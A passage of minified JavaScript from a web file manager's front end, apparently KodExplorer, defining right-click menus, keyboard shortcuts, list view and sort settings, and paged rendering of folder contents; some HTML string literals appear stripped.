efresh":ui.f5(!0,!0);break;case"back":ui.path.history.back();break;case"next":ui.path.history.next();break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-split":ui.setListType("split");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"upload":core.upload(),$(".dialog-file-upload").hide(),setTimeout(function(){$("#picker .webuploader-element-invisible").click()},100);break;case"recycle-clear":ui.path.recycleClear();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(100);break;case"box-size-bigx":ui.setFileIconSize(120);break;case"past":ui.path.past();break;case"copy-see":ui.path.clipboard();break;case"newfolder":ui.path.newFolder();break;case"newfile":ui.path.newFile("txt");break;case"newfile-null":ui.path.newFile("");break;case"newfile-md":ui.path.newFile("md");break;case"newfile-html":ui.path.newFile("html");break;case"newfile-php":ui.path.newFile("php");break;case"newfile-js":ui.path.newFile("js");break;case"newfile-css":ui.path.newFile("css");break;case"newfile-oexe":ui.path.newFile("oexe");break;case"newfile-docx":ui.path.newFile("docx");break;case"newfile-xlsx":ui.path.newFile("xlsx");break;case"newfile-pptx":ui.path.newFile("pptx");break;case"info":ui.path.info();break;case"open":ui.path.open();break;case"app-install":ui.path.appList();break;case"setting":core.setting();break;case"setting-theme":core.setting("theme");break;case"setting-wall":core.setting("wall");break;default:}},A=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"share":ui.path.share();break;case"open-browser":ui.path.openWindow();break;case"share-edit":ui.path.shareEdit();break;case"share-open-window":ui.path.shareOpenWindow();break;case"share-open-path":ui.path.shareOpenPath();break;case"fav":ui.path.fav();break;case"search":ui.path.search();break;case"copy":ui.path.copy();break;case"clone":ui.path.copyDrag(G.thisPath,!0);break;case"cute":ui.path.cute();break;case"cute-to":ui.path.cuteTo();break;case"copy-to":ui.path.copyTo();break;case"remove":ui.path.remove();break;case"rname":ui.path.rname();break;case"set-background":ui.path.setBackground();break;case"create-link-home":ui.path.createLink(!1);break;case"create-link":ui.path.createLink(!0);break;case"create-project":ui.path.createProject();break;case"open-project":ui.path.openProject();break;case"explorer":ui.path.explorer();break;case"explorer-new":ui.path.explorerNew();break;case"fav-page":core.setting("fav");break;case"fav-remove":ui.path.favRemove();break;case"info":ui.path.info();break;default:D(e)}},E=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-tree-fav-root",callback:function(e){F(e)},items:{"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"r"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"e"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-tree-fav",callback:function(e){F(e)},items:{"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep2:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},j=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){F(e)},items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},newfile:{name:LNG.newfile,className:"newfile",icon:"file-text-alt",accesskey:"j"},sep2:"--------",fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"}}})},z=function(){$('').appendTo("#rightMenu"),$('').appendTo("#rightMenu");var e={zIndex:9999,selector:".menu-tree-folder",callback:function(e){F(e)},items:{download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep105:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep3:"--------",info:{name:LNG.info+'',className:"info",icon:"info",accesskey:"i"}}};$.contextMenu(e);var t={"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep0:"--------"};e.selector=".menu-tree-folder-fav",e.items=$.extend(t,e.items,!0),$.contextMenu(e)},P=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){F(e)},items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",className:"more-action",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep106:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep3:"--------",info:{name:LNG.info+'Alt+I',className:"info",icon:"info",accesskey:"i"}}})},O=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:r,callback:function(e){F(e)},items:{refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"e"}}})},I=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:l,callback:function(e){F(e)},items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}})},R=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:c,callback:function(e,t){var a=t.$trigger;a.hasClass("file")?A(e):F(e)},items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}})},H=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,className:s.substr(1),selector:s,callback:function(e){F(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",className:"more-action",items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}},sep3:"--------",info:{name:LNG.info+'Alt+I',className:"info",icon:"info",accesskey:"i"}}})},F=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"copy":ui.tree.copy();break;case"cute":ui.tree.cute();break;case"past":ui.tree.past();break;case"clone":ui.tree.clone();break;case"rname":ui.tree.rname();break;case"remove":ui.tree.remove();break;case"info":ui.tree.info();break;case"cute-to":ui.tree.cuteTo();break;case"copy-to":ui.tree.copyTo();break;case"download":ui.tree.download();break;case"open-browser":ui.tree.openWindow();break;case"search":ui.tree.search();break;case"share":ui.tree.share();break;case"search":ui.tree.search();break;case"newfolder":ui.tree.create("folder");break;case"newfile":ui.tree.create("txt");break;case"newfile-html":ui.tree.create("html");break;case"newfile-php":ui.tree.create("php");break;case"newfile-js":ui.tree.create("js");break;case"newfile-css":ui.tree.create("css");break;case"newfile-oexe":ui.tree.create("oexe");break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"fav-page":core.setting("fav");break;case"fav":ui.tree.fav();break;case"create-link-home":ui.tree.createLink(!1);break;case"fav-remove":ui.tree.favRemove();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initDesktop:u,initExplorer:p,initEditor:f}}),define("app/src/explorer/ui",["./fileContent"],function(e){var t=e("./fileContent"),a=t.f5,i=t.f5Callback,n=function(e){G.userConfig.listType=e,LocalData.set("listType",e),$(".set-icon-size").hide(),$(".tools-right button").removeClass("active"),$("[data-action=set-"+e+"]").addClass("active"),$("#list-type-header,.line-split-box").addClass("hidden"),$(".set-file-icon-size").hide(),$(Config.FileBoxSelector).removeClass("file-list-icon file-list-list file-list-split"),"list"==e?($(Config.FileBoxSelector).addClass("file-list-list"),$("#list-type-header").removeClass("hidden"),ui.fileListResize.bindHeaderResize()):"icon"==e?($(Config.FileBoxSelector).addClass("file-list-icon"),$(".set-icon-size").show(),$(".set-file-icon-size").show()):"split"==e&&($(Config.FileBoxSelector).addClass("file-list-split"),$(".line-split-box").removeClass("hidden")),$(".menu-set-icon").removeClass("selected"),$(".set-"+e).addClass("selected"),$(".file-continerMore").css("top",0);var t=$(".frame-right-main .tools").outerHeight();"list"==e&&(t+=26),$(".frame-header").is(":visible")&&(t+=$(".frame-header").outerHeight()),$(".bodymain").css("top",t)},o=function(e){n(e),a(!1,!1),void 0===G.sid&&$.get(G.appHost+"setting/set&k=listType&v="+e)},s=function(e,t){0!=e?(G.userConfig.listSortField=e,$(".menu-set-sort").removeClass("selected"),$(".set-sort-"+e).addClass("selected")):e=G.userConfig.listSortField,0!=t?(G.userConfig.listSortOrder=t,$(".menu-set-desc").removeClass("selected"),$(".set-sort-"+t).addClass("selected")):t=G.userConfig.listSortOrder,LocalData.set("listSortField",e),LocalData.set("listSortOrder",t),a(!1,!0),$.ajax({url:G.appHost+"setting/set&k=listSortField,listSortOrder&v="+e+","+t})},r=function(){$(".menu-recycle-button").bind("mouseenter",function(){$(this).addClass("recycle-hover")}).bind("mouseleave",function(){$(this).removeClass("recycle-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_RECYCLE)}),$(".menuShareButton").bind("mouseenter",function(){$(this).addClass("share-hover")}).bind("mouseleave",function(){$(this).removeClass("share-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_SHARE+":"+G.userID+"/")})},l=function(){$("#main-title div").die("click").live("click",function(){$(this).hasClass("resize")||("up"==$(this).attr("id")?$(this).attr("id","down"):$(this).attr("id","up"),s($(this).attr("field"),$(this).attr("id")))})},c=function(){$(".tools a,.tools button").bind("click",function(){var e=$(this).attr("data-action");m(e)})},d=function(){$(".dropdown-menu-theme li").click(function(){var e=$(this).attr("theme");ui.setTheme(e),$.ajax({url:G.appHost+"setting/set&k=theme&v="+e,dataType:"json",success:function(e){if(!e.code){var t=LNG.config_save_error_file;core.authCheck("setting.set")||(t=LNG.config_save_error_auth),Tips.tips(t,!1)}}})})},p=function(){$(".dialog-goto-path").bind("click",function(){var e=G.jsonData.info.adminRealPath;ui.path.list(e)}),$(".toolbar-path-more").die("click").live("click",function(){if($(this).hasClass("active"))return $(".menu-tool-path").trigger("contextmenu:hide"),$(this).removeClass("active"),void 0;$(this).addClass("active");var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$(".tool-path-newfile,.tool-path-upload").die("click").live("click",function(){var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$("body").bind("click",function(){$(".toolbar-path-more").removeClass("active"),$(".menu-tool-path").trigger("contextmenu:hide")})},u=function(){if("icon"!=G.userConfig.listType)return 1;var e=$(Config.FileBoxSelector).width(),t=$(Config.FileBoxClass).outerWidth()+$sizeInt($(Config.FileBoxClass).css("margin-right"));return parseInt(e/t)},f=function(){var e=u(),t=$(Config.BodyContent).outerHeight(),a=$(Config.FileBoxClass).outerHeight()+$sizeInt($(Config.FileBoxClass).css("margin-bottom"));return Math.ceil(t/a)*e},h=function(){var e=$(Config.FileBoxSelector).outerHeight()-48,t=$(Config.FileBoxClass).outerHeight()+10;return parseInt(e/t)},m=function(e){switch(e){case"recycle-clear":ui.path.recycleClear();break;case"refresh":ui.f5();break;case"newfolder":ui.path.newFolder();break;case"upload":core.upload();break;case"select-all":ui.fileSelect.selectPos("all");break;case"download":ui.path.download();break;case"set-icon":o("icon");break;case"set-list":o("list");break;case"set-split":o("split");break;default:}},v=function(){var e,t=0,a="",i=300;Mousetrap.bind(["1","2","3","4","5","6","7","8","9","0","`","~","!","@","#","$","%","^","&","*","(",")","-","_","=","+","[","{","]","}","|","/","?",".",">",",","<","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"],function(n){var o=String.fromCharCode(n.charCode);return 0==t?(t=timeFloat(),a=o,Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i),void 0):(i>timeFloat()-t&&(t=timeFloat(),a+=o,clearTimeout(e),Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i)),void 0)})},g=function(){v(),Mousetrap.bind(["f1","alt+left","backspace","alt+right","ctrl+backspace","command+backspace","ctrl+shift+r","f5","left","up","right","down","home","end","shift+left","shift+up","shift+right","shift+down","shift+home","shift+end","pageup","pagedown","ctrl+a","command+a","ctrl+shift+n","ctrl+shift+f","del","shift+del","f2","ctrl+enter","command+enter","shift+enter","space","enter","ctrl+u","command+u","ctrl+c","command+c","ctrl+x","command+x","ctrl+v","command+v","ctrl+f","command+f","f3","ctrl+i","alt+i","alt+n","alt+m","alt+enter","ctrl+s","command+s","alt+f4"],function(e,t){if($("body").hasClass("stop_hot_key"))return!0;if(ui.isEdit())return!0;if($.contextMenu.isDisplay())return!0;if($(".dialog-path-remove").length>0)return!0;var a=["ctrl+c","command+c","ctrl+v","command+v","ctrl+x","command+x"];switch(inArray(a,t)||stopPP(e),t){case"f1":core.setting("help");break;case"alt+left":case"backspace":ui.path.history.back();break;case"alt+right":case"ctrl+backspace":case"command+backspace":ui.path.history.next();break;case"ctrl+shift+r":case"f5":ui.f5(!0,!0);break;case"left":case"up":case"right":case"down":case"home":case"end":case"shift+left":case"shift+up":case"shift+right":case"shift+down":case"shift+home":case"pageup":case"pagedown":case"shift+end":ui.fileSelect.selectPos(t);break;case"ctrl+a":case"command+a":ui.fileSelect.selectPos("all");break;case"ctrl+shift+n":ui.path.newFolder();break;case"ctrl+shift+f":ui.path.newFile();break;case"del":ui.path.remove();break;case"shift+del":ui.path.remove(!1,!0);break;case"f2":case"ctrl+enter":case"command+enter":ui.path.rname();break;case"shift+enter":ui.path.download();break;case"space":ui.path.open();break;case"enter":ui.path.open();break;case"ctrl+u":case"command+u":core.upload();break;case"ctrl+e":case"ctrl+c":case"command+c":ui.path.copy();break;case"ctrl+x":case"command+x":ui.path.cute();break;case"ctrl+v":case"command+v":ui.path.past();break;case"f3":case"ctrl+f":case"command+f":ui.path.search($(".header-right input").val(),G.thisPath);break;case"alt+enter":case"ctrl+i":case"alt+i":ui.path.info();break;case"alt+n":ui.path.newFile();break;case"alt+m":ui.path.newFolder();break;case"ctrl+s":case"command+s":ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()});break;default:}})},b=function(){if(core.isApp("desktop")){var e=20,t=20,a=parseInt($(".file").css("height")),i=a-30,n=10,o=15,s=$(document).height()-80,r=Math.floor((s-e)/(a+n)),l=0,c=0,d=0,p=0,u=(s-e-r*(a+n)-n)/r;u>0&&(n+=u),$(".file-continer .file").css("position","absolute"),$(".file-continer .file").each(function(s){l=s%r,c=Math.floor(s/r),d=t+(i+o)*c,p=e+(a+n)*l,$(this).css({left:d,top:p})})}};return{f5:a,f5Callback:i,fileContent:t,initListType:n,setListSort:s,setListType:o,getRowfileNumber:u,getPagefileNumber:f,getColfileNumberDesktop:h,resetDesktopIcon:b,setTheme:function(e){G.userConfig.theme=e,core.setSkin(e),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)}),ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setThemeSelf(e)}),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),$(".dropdown-menu-theme .list").removeClass("this"),$('.dropdown-menu-theme .list[theme="'+e+'"]').addClass("this")},setWall:function(e,t){$(".background").attr("src",e).one("load",function(){$(".full-background").css("background-image","url("+e+")"),"function"==typeof t&&t()})},setFileIconSize:function(e){ui.fileListResize.setFileIconSize(e,!0),core.isApp("desktop")&&ui.f5()},isEdit:function(){var e=$(document.activeElement).get(0);if(e)return e=e.tagName,"INPUT"==e||"TEXTAREA"==e?!0:$(".file.file-icon-edit").length>0?!0:!1},init:function(){if(G.sid){LocalData.get("theme")&&(G.userConfig.theme=LocalData.get("theme")),LocalData.get("listType")&&(G.userConfig.listType=LocalData.get("listType")),LocalData.get("listSortField")&&(G.userConfig.listSortField=LocalData.get("listSortField")),LocalData.get("listSortOrder")&&(G.userConfig.listSortOrder=LocalData.get("listSortOrder")),LocalData.set("theme",G.userConfig.theme),LocalData.set("listType",G.userConfig.listType),LocalData.set("listSortField",G.userConfig.listSortField),LocalData.set("listSortOrder",G.userConfig.listSortOrder);var e=window.location.href.split("#");2==e.length&&(G.thisPath=urlDecode(e[1]))}if(ui.setTheme(G.userConfig.theme),""==G.thisPath){var a=G.userID||G.sid,o=LocalData.get("thisPath:"+a);G.thisPath=o?o:G.myhome}n(G.userConfig.listType),t.init(),b(),ui.path.history.add(G.thisPath),i(function(){b()}),r(),l(),d(),c(),g(),p()}}}),define("app/src/explorer/fileContent",[],function(require,exports){var tpl=require("../../path/tpl/file/list.html"),pageLoadMax=200,ajaxLive=function(){ui.fileLight.init(),core.isApp("desktop")&&ui.resetDesktopIcon(),"split"==G.userConfig.listType&&ui.fileListResize.bindSplitResize(),lazyLoadImage(),iconFlex(),Hook.trigger("explorer.path.ajaxLive")},lazyLoadImage=function(){var e=$(".bodymain");"split"==G.userConfig.listType&&(e=$(".split-box").last().find(".content")),e.find(".lazyload-ready").lazyload({failure_limit:10,threshold:200,placeholder:G.staticPath+"images/common/loading_circle.gif",skip_invisible:!1,effect:"fadeIn",container:e,load:function(){$(this).removeClass("lazyload-ready")}}).on("error",function(){var e=$(this).data("errorReload");e?"1"==e&&($(this).parent().attr("filetype"),$(this).attr("src",G.staticPath+"images/file_icon/icon_file/picture_error.png"),$(this).data("errorReload","2")):($(this).attr("src",$(this).attr("src")+"#"+UUID()),$(this).data("errorReload","1"))})},iconFlex=function(){if(!core.isApp("desktop")&&"icon"==G.userConfig.listType){$(".file-list-icon .flex-empty").remove();for(var e="",t=0;30>t;t++)e+='
    ';$(e).appendTo(".file-list-icon")}},mainDataDefaultApps=function(){template.helper("fileIconMake",fileIconMake);var e=template.compile(tpl),t="";for(var a in desktopApps){var i={LNG:LNG,G:G,list:desktopApps[a],type:"icon-file"};t+=e(i)}return t},mainSetData=function(e){var t=makeHtml(G.jsonData,0,getPageNumber()-1);core.isApp("desktop")&&(t=mainDataDefaultApps()+t),t=htmlListAction(G.jsonData,t,!1),"split"==G.userConfig.listType&&(t='
    '+t+'
    '),e?$(Config.FileBoxSelector).hide().html(t).fadeIn(Config.AnimateTime).css("display",""):$(Config.FileBoxSelector).html(t),"split"==G.userConfig.listType&&$(".split-box").data("jsonData",G.jsonData),ajaxLive()},scrollDelayTimer="",bindScrollLoadMore=function(){var e=$(".bodymain");e.scroll(function(){clearTimeout(scrollDelayTimer),scrollDelayTimer=!1,scrollDelayTimer=setTimeout(function(){0!=e.scrollTop()&&loadMore()},100)}),$(".split-load-more").live("dblclick",function(){$("[data-action=set-list]").click()})},getPageNumber=function(){var e=ui.fileLight.fileListAll().last(),t=$(".bodymain .file-continer-more");if(0==e.length)return pageLoadMax;var a=G.jsonData.folderList.length+G.jsonData.fileList.length;if(t.css("top",0),pageLoadMax>a||"split"==G.userConfig.listType)return pageLoadMax;var e=ui.fileLight.fileListAll().last(),i=e.outerWidth()+$sizeInt(e.css("margin-right"))+3.5,n=parseInt($(".file-continer").width()/i);"icon"!=G.userConfig.listType&&(n=1);var o=e.outerHeight()+$sizeInt(e.css("margin-bottom")),s=Math.ceil($(Config.BodyContent).height()/o),r=Math.ceil(a/n)*o;return t.css("top",r),s*n},resetTotalHeight=function(){var e=".bodymain .file-continer > .file",t=$(e).last(),a=$(".bodymain .file-continer-more");if(0!=t.length){var i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(a.css("top",0),!(pageLoadMax>i||"split"==G.userConfig.listType)){var n=t.outerWidth()+$sizeInt(t.css("margin-right")),o=parseInt($(".file-continer").width()/n);"icon"!=G.userConfig.listType&&(o=1);var s=t.outerHeight()+$sizeInt(t.css("margin-bottom"));Math.ceil($(Config.BodyContent).height()/s);var r=Math.ceil(i/o)*s;a.css("top",r)}}},loadMoreDelayTimer,loadMore=function(){var e=$(".bodymain .file-continer > .file"),t=e.last(),a=e.length-1,i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(!(a>=i-1||"split"==G.userConfig.listType)){var n=$(".bodymain").scrollTop(),o=$(".bodymain").height(),s=$(".bodymain").offset().top;$(".file-continer").offset().top;var r=t.outerHeight()+$sizeInt(t.css("margin-bottom")),l=s+o-r;if(l>t.offset().top){var c=l-t.offset().top,d=getPageNumber(),p=Math.ceil(c/o),u=p*d+a; -u>i&&(u=i),u-a>1e3?($(".init-loading").show(),clearTimeout(loadMoreDelayTimer),loadMoreDelayTimer=setTimeout(function(){loadMoreSet(a+1,u),$(".bodymain").scrollTop(n)},300)):loadMoreSet(a+1,u)}}},loadMoreSet=function(e,t){var a=makeHtml(G.jsonData,e,t),i=$(a);i.appendTo(".file-continer"),ui.fileLight.fileListAll($(Config.FileBoxClass)),ui.fileLight.menuAction("clear"),lazyLoadImage(),iconFlex(),$(".init-loading").hide()},fileIconMake=function(e,t,a){var i="icon"!=t;if("folder"==e){var n=Hook.trigger("explorer.list.folderThumb",a.path,a.ext);return"string"==$.type(n)?n:(e=a.ext||e,core.icon(e,i))}var n=Hook.trigger("explorer.list.fileThumb",a.path,a.ext);if("string"==$.type(n))return n;if(inArray(["jpg","jpeg","png","bmp","gif","ico","svg","cur","webp"],a.ext)){var o=G.appHost+"explorer/image&path=";return G.sid&&(o=G.appHost+"share/image&user="+G.user+"&sid="+G.sid+"&path="),"
    "}if("app_link"==a.type){var s=core.icon("folder");0==a.content.search("ui.path.open")?s=core.icon(core.pathExt(a.name.replace(".oexe",""))):0==a.content.search("ui.path.list")&&(s=core.icon(a.icon));var r="
    "+s+"
    ";return r+""}if(a.icon&&"oexe"==a.ext){var l=a.icon;return"string"==$.type(a.icon)&&-1==a.icon.search(G.staticPath)&&"http"!=a.icon.substring(0,4)&&(l=G.staticPath+"images/file_icon/icon_app/"+a.icon),"
    "+core.iconSrc(l)+"
    "}return"
    "+core.icon(a.ext,i)+"
    "},makeHtml=function(e,t,a){template.helper("fileIconMake",fileIconMake);var i=template.compile(tpl),n="",o=[];o="up"==G.userConfig.listSortOrder?e.folderList.concat(e.fileList):e.fileList.concat(e.folderList),(!a||a>=o.length-1)&&(a=o.length-1);for(var s=t;a>=s;s++){var r="folder"==o[s].type?"-folder":"-file",l={LNG:LNG,G:G,list:o[s],index:s,type:G.userConfig.listType+r};n+=i(l)}return n},pathChildrenTree=function(e,t){if("string"==$.type(e))var a=$('.file[data-path="'+pathHashEncode(e)+'"]');else{var a=e;e=ui.fileLight.path(a)}if(1==a.length){var i=a.find(".children-more"),n=a.find(".children-more-cert"),o=$('.children-list[data-path-children="'+pathHashEncode(e)+'"]'),s=23;if(n.toggleClass("cert-open"),o.toggleClass("hidden"),o.hasClass("child-already-init"))return pathListOdd(),void 0;a.addClass("loading-children"),pathGet(e,function(e){a.removeClass("loading-children");var n=makeHtml(e,0,getPageNumber()-1);""!=n&&(n=htmlListAction(e,n,!0)),o.html(n),ajaxLive(),o.addClass("child-already-init");var r=s+parseInt(i.css("padding-left"));o.find(".file .children-more").css("padding-left",r),pathListOdd(),"function"==typeof t&&t(e)})}},htmlListAction=function(e,t,a){if(""==t)return t='
    '+LNG.path_null+"
    ";var i=e.folderList.concat(e.fileList);if(i.length>pageLoadMax){var n=core.pathFather(i[0].path);"list"==G.userConfig.listType&&a?t+='
    '+'
    '+''+'
    '+''+LNG.file_load_all+""+"
    "+"
    ":"split"==G.userConfig.listType&&(t+='
    '+'
    '+'
    '+''+LNG.file_load_all+"(to list)"+"
    "+"
    ")}return t},pathListOdd=function(){var e=0;ui.fileLight.fileListAll().each(function(){0==$(this).parents(".hidden").length&&(0==e%2?$(this).addClass("file2"):$(this).removeClass("file2"),e++)})},pathChildrenSplit=function(e,t){var a=$('.file[data-path="'+pathHashEncode(e)+'"]'),i=$(".file-list-split .split-box[data-path='"+pathHashEncode(e)+"']");if(0==a.length)return"function"==typeof t&&t(),void 0;if(1==i.length)return i.nextAll().remove(),"function"==typeof t&&t(),void 0;var n=a.parent().parent();pathSplitCreate(e,t,n)},pathSplitCreate=function(e,t,a){pathGet(e,function(i){if("notExists"==i.pathReadWrite)return t(i);var n=makeHtml(i,0,getPageNumber()-1);if(n=htmlListAction(i,n,!0),a)if(a.nextAll(".split-box").length>0){var o=a.next(".split-box");o.attr("data-path",pathHashEncode(e)).find(".content").html(n),o.nextAll().remove()}else n='
    '+n+'
    ',$(n).insertAfter(a).data("jsonData",i);else n='
    '+n+'
    ',$(n).appendTo(".file-list-split").data("jsonData",i);ajaxLive(),"function"==typeof t&&t()})},beforeSelectFileArr={},beforeListOpenArr={},beforeListOpen={},beforeListSplitSelect="",beforeScrollerLeft=0,f5Before=function(){if(!("icon"==G.userConfig.listType||beforeListOpenArr.length>0))if(beforeListOpenArr={},beforeListOpen={},"list"==G.userConfig.listType){var e=$(".child-already-init:visible");if(1>e.length)return;e.each(function(){var e=$(this),t=beforeListOpenArr,a=ui.fileLight.path(e,"data-path-children");beforeListOpen[a]=!1;for(var i=[a];0!=e.parents(".children-list").length;)e=e.parents(".children-list"),i.push(ui.fileLight.path(e,"data-path-children"));for(var n=i.length-1;n>=0;n--){var o=i[n];t[o]!==void 0?t=t[o]:t[o]={}}})}else if("split"==G.userConfig.listType){var t=beforeListOpenArr;beforeScrollerLeft=$(".drag-upload-box").scrollLeft(),beforeListSplitSelect=ui.fileLight.path($(".file-list-split .split-box.split-select")),$(".file-continer .split-box").each(function(){var e=ui.fileLight.path($(this));""!=e&&(t[e]={},t=t[e],beforeListOpen[e]=!1)})}},f5After=function(e){return"icon"==G.userConfig.listType||0==Object.keys(beforeListOpenArr).length?(f5AfterReloadFinished(e),void 0):("split"==G.userConfig.listType&&$(".file-list-split .split-box").remove(),f5AfterReload(beforeListOpenArr,e),void 0)},f5AfterReload=function(e,t){$.each(e,function(e,a){var i=pathChildrenTree;"split"==G.userConfig.listType&&(i=pathSplitCreate),i(e,function(){beforeListOpen[e]=!0,0!=Object.keys(a).length?f5AfterReload(a,t):f5AfterReloadFinished(t)})}),f5AfterReloadFinished(t)},f5AfterReloadFinished=function(e){for(var t in 